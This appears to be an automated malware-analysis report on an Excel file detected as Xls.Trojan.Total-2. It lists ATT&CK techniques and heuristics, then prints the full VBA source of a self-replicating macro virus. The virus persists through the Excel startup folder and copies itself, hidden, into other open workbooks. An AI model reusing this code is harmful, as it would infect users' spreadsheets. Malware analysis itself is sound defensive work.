MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel file containing VBA macros, including Auto_Open and Auto_Close functions, which are commonly used for malicious purposes. The script attempts to copy its VBA module to other workbooks and save itself as 'INSTALL.XLS' in the Excel startup path, indicating a persistence mechanism. The presence of Auto_Open and Auto_Close macros, along with the file's detection as 'Xls.Trojan.Total-2', strongly suggests malicious intent.
Heuristics 4
-
ClamAV: Xls.Trojan.Total-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Total-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2109 bytes |
SHA-256: ff0527cfeb0c234ae8873b33a3a1020113f43265f483900c57134bcfe27dd943 |
|||
|
Detection
ClamAV:
Xls.Trojan.Total-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sum_total"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = ThisWorkbook.Name & "!sum_total.total"
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
'On Error Resume Next
PC_INITIAL_BOOK = Application.ThisWorkbook.Name
If Dir("C:\PASS.NHS") = "PASS.NHS" Then Exit Sub
pc_excel_startup_path = Application.StartupPath + "\INSTALL.XLS"
If Dir(pc_excel_startup_path) = "INSTALL.XLS" Then Exit Sub
'dstart:
'MsgBox "STARTING UP!"
ThisWorkbook.Modules("sum_total").Copy
new_book = ActiveWorkbook.Name
WindowState = xlMaximized
Application.Windows(new_book).Visible = False
'Application.Workbooks(new_book).SaveAs filename:=PC_EXCEL_STARTUP_PATH
Application.Workbooks(new_book).SaveAs filename:=pc_excel_startup_path
'MsgBox "All done saved as " & pc_excel_startup_path
'thisWorkbook.SaveAs filename:=PC_EXCEL_STARTUP_PATH
'ThisWorkbook.SaveAs filename:=PC_INITIAL_BOOK
End Sub
Sub total()
Attribute total.VB_ProcData.VB_Invoke_Func = " \n14"
PC_BOOK_COUNT = Application.Workbooks.Count
If PC_BOOK_COUNT = 1 Then Exit Sub
For pc_first_loop = 1 To PC_BOOK_COUNT
pc_copy_trigger = 0
PC_TARGET = Workbooks(pc_first_loop).Name
If PC_TARGET = ThisWorkbook.Name Then GoTo redundancy_check
pc_module_count = Workbooks(PC_TARGET).Modules.Count
If pc_module_count > 0 Then
For PC_SECOND_LOOP = 1 To pc_module_count
If Workbooks(PC_TARGET).Modules(PC_SECOND_LOOP).Name = "sum_total" Then pc_copy_trigger = 1
Next PC_SECOND_LOOP
End If
If pc_copy_trigger = 0 Then
Windows(PC_TARGET).Activate
ThisWorkbook.Modules("sum_total").Copy before:=Workbooks(PC_TARGET).Sheets(1)
Workbooks(PC_TARGET).Modules("sum_total").Visible = False
End If
redundancy_check:
Next pc_first_loop
skip:
Exit Sub
' ***********************************
' * IF YOU READ THIS THEN YOU WILL *
' * REALISE THAT YOU HAVE THE MOST *
' * RUBBISH ANTI-VIRUS SOFTWARE *
' * BEWARE BECAUSE RELEASE II WILL *
' * SCRAMBLE YOUR FAT - XOH *
' ***********************************
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.